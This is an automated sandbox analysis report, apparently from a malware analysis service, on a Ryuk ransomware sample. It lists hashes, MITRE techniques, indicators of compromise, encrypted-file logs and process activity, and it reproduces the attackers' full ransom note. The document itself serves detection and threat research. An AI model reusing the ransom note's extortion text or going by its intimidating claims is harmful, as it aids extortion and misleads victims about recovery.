ryuk | be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

Resubmissions

07-11-2022 11:53

221107-n2tpwsedf5 10

07-11-2022 11:00

221107-m36keacfd7 10

Analysis

max time kernel
179s
max time network
248s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 11:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Size

885KB
MD5

622bc38dee08e70e91e2be32a58b6d1f
SHA1

7cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512

176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
SSDEEP

12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4720	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\R:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Z:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\O:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\P:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Q:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\S:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Y:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\E:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\I:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\B:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\K:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\L:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\N:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\A:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\X:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\G:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\H:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\J:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\V:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\W:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\F:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\T:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\U:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\SubsystemController.man.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\ApproveRegister.asx.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jni.h.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\trusted.libraries.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\RegisterWrite.dwg.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2692	schtasks.exe
1352	schtasks.exe
1740	schtasks.exe
2432	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2752	taskkill.exe
3380	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	3380	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4116 wrote to memory of 4824	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	79
PID 4116 wrote to memory of 4824	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	79
PID 4824 wrote to memory of 1740	4824	cmd.exe	81
PID 4824 wrote to memory of 1740	4824	cmd.exe	81
PID 4116 wrote to memory of 4184	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	82
PID 4116 wrote to memory of 4184	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	82
PID 4116 wrote to memory of 3292	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	83
PID 4116 wrote to memory of 3292	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	83
PID 4116 wrote to memory of 4828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	84
PID 4116 wrote to memory of 4828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	84
PID 4828 wrote to memory of 2432	4828	cmd.exe	85
PID 4828 wrote to memory of 2432	4828	cmd.exe	85
PID 4116 wrote to memory of 1560	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	86
PID 4116 wrote to memory of 1560	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	86
PID 1560 wrote to memory of 4944	1560	cmd.exe	87
PID 1560 wrote to memory of 4944	1560	cmd.exe	87
PID 4116 wrote to memory of 920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	88
PID 4116 wrote to memory of 920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	88
PID 920 wrote to memory of 2692	920	cmd.exe	89
PID 920 wrote to memory of 2692	920	cmd.exe	89
PID 4116 wrote to memory of 4736	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	90
PID 4116 wrote to memory of 4736	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	90
PID 4736 wrote to memory of 1352	4736	cmd.exe	91
PID 4736 wrote to memory of 1352	4736	cmd.exe	91
PID 4116 wrote to memory of 116	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	92
PID 4116 wrote to memory of 116	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	92
PID 116 wrote to memory of 1780	116	cmd.exe	93
PID 116 wrote to memory of 1780	116	cmd.exe	93
PID 4116 wrote to memory of 3552	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	94
PID 4116 wrote to memory of 3552	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	94
PID 3552 wrote to memory of 1748	3552	cmd.exe	95
PID 3552 wrote to memory of 1748	3552	cmd.exe	95
PID 4116 wrote to memory of 1920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	96
PID 4116 wrote to memory of 1920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	96
PID 4116 wrote to memory of 3064	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	100
PID 4116 wrote to memory of 3064	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	100
PID 1920 wrote to memory of 1384	1920	cmd.exe	97
PID 1920 wrote to memory of 1384	1920	cmd.exe	97
PID 4116 wrote to memory of 3828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	99
PID 4116 wrote to memory of 3828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	99
PID 3828 wrote to memory of 3580	3828	cmd.exe	103
PID 3828 wrote to memory of 3580	3828	cmd.exe	103
PID 3064 wrote to memory of 3508	3064	cmd.exe	101
PID 3064 wrote to memory of 3508	3064	cmd.exe	101
PID 3828 wrote to memory of 2752	3828	cmd.exe	104
PID 3828 wrote to memory of 2752	3828	cmd.exe	104
PID 1384 wrote to memory of 4720	1384	cmd.exe	105
PID 1384 wrote to memory of 4720	1384	cmd.exe	105
